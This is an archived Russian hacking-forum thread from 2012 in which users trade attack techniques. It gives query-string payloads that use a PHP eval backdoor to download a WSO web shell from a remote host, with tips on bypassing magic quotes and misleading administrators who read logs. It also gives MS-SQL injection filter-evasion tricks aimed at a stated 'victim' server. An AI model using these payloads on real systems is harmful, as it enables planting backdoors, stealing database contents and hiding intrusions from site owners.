ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
18.11.2012, 18:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
97332
Репутация:
38
|
|
Сообщение от None
eval ($_REQUEST['a']);
После eval пробела быть не должно.
Сообщение от None
http://localhost/test.php?a=http://test1/wso2_pack.php
щито? eval - выполняет PHP код!
Юзай например так:
Сообщение от None
test.php?a=copy("http://site.com/you_wso.
TXT
","./wso.php");
Эта функция скопирует текствовый файл с сервера, и сохранит его рядом с test.php под именем wso.php
Обрати внимание, MQ должно быть off, иначе кавычки проэкранируются. Тогда нужно будет юзать base64.
|
|
|
|
18.11.2012, 20:07
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Pirotexnik
Pirotexnik said:
После eval пробела быть не должно.
щито? eval - выполняет
PHP
код!
Юзай например так:
Эта функция скопирует
текствовый
файл с сервера, и сохранит его рядом с test.php под именем wso.php
Обрати внимание, MQ должно быть off, иначе кавычки проэкранируются. Тогда нужно будет юзать base64.
не обязательно юзать base64 если хочется видеть читабельный вид для глаза, то можно сделать так:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]test[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]])&[/COLOR][COLOR="#0000BB"]a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.com/you_wso.TXT&b=wso.php[/COLOR][/COLOR]
а чтобы обойти MQ можно в мини шеле заюзать stripslashes()
но опять же если юзать base64 то просматривающего админом логи смогут завести его в заблуждение)
|
|
|
18.11.2012, 21:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
2564
Репутация:
0
|
|
дядьки, подскажите как в MS-SQL делать запросы БЕЗ ПРОБЕЛОВ
уж очень не хочется заморачиваться с устанавливкой и освоением MS-SQL
я так понимаю, что в MS-SQL при нормальном (НЕ-инъекции) использовании запрос
select(varXXXX)from(tblXXX)
не будет работает ?
у меня, например , SQL-инъекция с вышеупомянутым запросом "валится" с ошибкой 500 (отчёт об ошибках отключен, подробности не узнать...)
НО , например, запрос
select(@@version))
или
(db_name())
успешно "вытягивает" инфу из базы
Всё , что я научился сейчас "вытягивать" с базы , - это получение информации из встроенных функций Transact-SQL, описанных здесьhttp://msdn.microsoft.com/ru-ru/library/ms174318.aspx
например
(current_user)
(user)
(system_user)
(original_login())
и т.д.
но этого ,естесственно, мало
что вообще максимум можно поиметь, если sql-инъекция в MS-SQL возможна, но ТОЛЬКО БЕЗ ПРОБЕЛОВ ???
P.S.
пробелы скриптом ТОЧНО режутся
запрос вида
(select('qwe rty'))
успешно вернул мне
qwe%20rty
просто браузер каждый пробел в GET-запросе преобразует в %20 ,
и SQL-запрос с этими %20 прямо в таком виде и ПЫТАЕТСЯ выполниться, естесственно, с ошибкой ( http 500 )
P.P.S.
http://msdn.microsoft.com/ru-ru/library/ms178623(v=sql.100).aspx
использование комментариев вида /**/ вместо пробела в моем случае исключено
т.к. get-параметры передаются через косую черту, т.е. вот так
http://hostname/path/param1/param2/param3/param4/param5/
и использование комментариев вида /**/ приводит к ошибке
|
|
|
|
18.11.2012, 22:51
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от None
что вообще максимум можно поиметь, если sql-инъекция в MS-SQL возможна, но ТОЛЬКО БЕЗ ПРОБЕЛОВ ???
В MSSQL в качестве пробелов проходят следующие конструкции
+,01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10, 11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20,%
Юзать примерно так
SELECT %01column %02FROM %03table;
+or +1=1 ну и так далее....
Ещё есть такая вариация
SELECT "table_name "FROM [information_schema ].[tables ]
|
|
|
|
18.11.2012, 23:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
2564
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
В MSSQL в качестве пробелов проходят следующие конструкции
+,01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10, 11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20,%
Юзать примерно так
SELECT
%01
column
%02
FROM
%03
table;
+
or
+
1=1 ну и так далее....
Ещё есть такая вариация
SELECT
"
table_name
"
FROM
[
information_schema
].[
tables
]
если мой get-запрос содержит знак плюса, тогда ошибка такая
Server Error
404 - File or directory not found.
The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.
Причем неважно в каком месте get-запроса находится знак плюса - даже внутри кавычек селекта
http://hostname/path/param1/(select('1+1'))/param3/param4/
вываливается вышеуказанная ошибка
хотя если знак плюса заменить на другой - будет всё ОК
http://hostname/path/param1/(select('1%1'))/param3/param4/
с процентами с любыми не хочет работать
т.е. get-запрос
http://hostname/path/param1/(select%20'qwerty'))/param3/param4/
приводит к http-ошибке 500
квадратные скобки [] в GET-запросе браузер автоматически переделывает в %5B и %5D
и опять-же, запрос с процентами не "кушает" и выдаёт 500-ую ошибку
скачал себе с официального сайта ms-sql 2012 ( как у жертвы )
целый час качалось
теперь уже час устанавливается
буду тестировать оригинальные запросы типа
select%20'qwerty'
что-то мне подсказывает, что такие запросы не будут выполняться....
установил-таки MS-SQL 2012
запрос
select%20'qwerty'
вызвал ошибку
Сообщение 102, уровень 15, состояние 1, строка 1
Неправильный синтаксис около конструкции "20".
и все другие запросы с % в MSSQL 2012 тоже не работают:
select%01'qwerty'
select%02'qwerty'
select%03'qwerty'
select%04'qwerty'
...
select%20'qwerty'
запрос
select(table_name)from INFORMATION_SCHEMA.TABLES
в MSSQL 2012 отлично работает
но запросы
select(table_name)from (INFORMATION_SCHEMA.TABLES)
select(table_name)from(INFORMATION_SCHEMA.TABLES)
в MSSQL 2012 вызывают ошибку
Сообщение 102, уровень 15, состояние 1, строка 1
Неправильный синтаксис около конструкции ")".
|
|
|
|
18.11.2012, 23:23
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Скорее всего WAF срабатывает. Используй вариации, что я указал постом выше.
Там кстати я ещё обновил информацию.
|
|
|
|
18.11.2012, 23:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
2564
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
Скорее всего WAF срабатывает. Используй вариации, что я указал постом выше.
Там кстати я ещё обновил информацию.
я уже заметил и тоже обновил свой ответ
спасибо за посильную помощь
|
|
|
|
18.11.2012, 23:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
2564
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
Скорее всего WAF срабатывает. Используй вариации, что я указал постом выше.
Там кстати я ещё обновил информацию.
у Вас (или у кого-нибудь ещё) есть возможность проверить - выполняется ли в оригинале на MS-SQL 2012 запрос вида
(select(varXXX)from(tableXXX))
т.е. вместо пробелов - скобки
?
|
|
|
|
18.11.2012, 23:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
2564
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
Скорее всего WAF срабатывает. Используй вариации, что я указал постом выше.
Там кстати я ещё обновил информацию.
это не WAF срабатывает
читайте мой пост выше
я его (тот пост) в очередной раз обновил....
|
|
|
|
19.11.2012, 08:22
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от aadktnbaov
aadktnbaov said:
запрос
select(table_name)from INFORMATION_SCHEMA.TABLES
в MSSQL 2012 отлично работает
но запросы
select(table_name)from (INFORMATION_SCHEMA.TABLES)
select(table_name)from(INFORMATION_SCHEMA.TABLES)
в MSSQL 2012 вызывают ошибку
Сообщение 102, уровень 15, состояние 1, строка 1
Неправильный синтаксис около конструкции ")".
А квадратные скобки пробовал?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
